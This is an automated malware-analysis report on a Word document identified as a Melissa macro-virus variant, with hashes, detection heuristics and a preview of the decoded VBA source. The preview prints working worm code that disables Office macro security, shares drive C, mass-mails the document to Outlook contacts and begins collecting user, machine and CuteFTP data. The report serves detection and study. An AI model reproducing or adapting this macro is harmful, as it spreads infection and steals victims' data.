Melissa — Office (OLE) malware analysis

Static analysis result for SHA-256 c439f5e3af9b7f0c…

MALICIOUS

Office (OLE)

41.0 KB Created: 2001-04-02 22:59:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 7cf7bc5cc60685861fa1cdac2cee7d4d SHA-1: 336aa5c1fd7678202f24c7c3cd5cf4b2b3b7f201 SHA-256: c439f5e3af9b7f0c7a3010a6870dcbc32ffa5120137df674f5a93e94520896c4
260 Risk Score

Malware Insights

Melissa · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro that attempts to disable security features and spread itself. The ClamAV detection 'Doc.Trojan.Melissa-1' strongly suggests this is a variant of the Melissa virus, which is known for its email-spreading capabilities. The macro attempts to modify registry keys related to Office security settings.

Heuristics 5

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28807 bytes
SHA-256: 0b628a7d56a0e68f5af94fca52d2cd05d98d6770dc6c9174a402ad0691f4b3cf
Detection
ClamAV: Doc.Trojan.Melissa-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "MelissaFX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueExLong Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpValue As Long, ByVal cbData As Long) As Long
Private Declare Function RegSetValueExString Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long
    Set prevDocument = ActiveDocument
    Set nextDocument = NormalTemplate
Private Sub Document_Open()
Randomize
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (5 - 5): Options.VirusProtection = (5 - 5): Options.SaveNormalPrompt = (5 - 5)
End If
ShareDriveC
DisableCtrlAltDelete (True)
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "MelissaFX") <> 1 Then _
DoMail (Int(Rnd * 30) + 30) / 100, True
DoInf
DisableCtrlAltDelete (False)
End Sub
Private Function DisableCtrlAltDelete(bDisabled As Boolean)
    x = SystemParametersInfo(97, bDisabled, CStr(1), 0)
End Function
Private Function DoMail(Percent, Info As Boolean)
Dim UDasOutlook, DasMapiName, MyMail, MyInfo, oFolder
Set UDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UDasOutlook.GetNamespace("MAPI")
If UDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
    For y = 1 To DasMapiName.AddressLists.Count
        Set AddyBook = DasMapiName.AddressLists(y)
        Set MyMail = UDasOutlook.CreateItem(0)
        TotList = AddyBook.AddressEntries.Count
        If TotList > 10 Then
         TotMail = Int(TotList * Percent)
         tmp = TotMail - 1
         AdrBegin = Int(Rnd * (TotList - tmp)) + 1
         AdrStop = AdrBegin + tmp
        Else
         AdrBegin = 1
         AdrStop = TotList
        End If
        For x = AdrBegin To AdrStop
            EAdr = AddyBook.AddressEntries(x)
            MyMail.Recipients.Add EAdr
        Next x
          Set oFolder = DasMapiName.GetDefaultFolder(6)
          RNItem = Int(Rnd * oFolder.items.Count) + 1
        With MyMail
         .Attachments.Add ActiveDocument.FullName
         .Importance = Int(Rnd * 2) + 1
         .DeleteAfterSubmit = True
          If oFolder.items.Count > 0 And Int(Rnd * 3) + 1 > 1 Then _
         .body = oFolder.items(RNItem).body
         .Subject = SmartSubj
         .Send
        End With
    Next y
    If Info = True Then
     DefltCuteFTP = "c:\progra~1\cuteftp\tree.dat"
        If Dir(DefltCuteFTP) = "" Then
         With Application.FileSearch
          .FileName = "tree.dat"
          .LookIn = "c:\progra~1\"
          .SearchSubFolders = True
          .Execute
          CuteFTP = .FoundFiles(1)
         End With
        Else
          CuteFTP = DefltCuteFTP
        End If
        If CuteFTP <> "" Then
         tmpkey = "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion"
         tmpkey2 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\"
         Usr = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Network\Logon", "Username")
         PC = System.PrivateProfileString("", tmpkey2 & "ComputerName\ComputerName", "ComputerName")
         Org = System.PrivateProfileString("", tmpkey, "RegisteredOrganization")
  
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.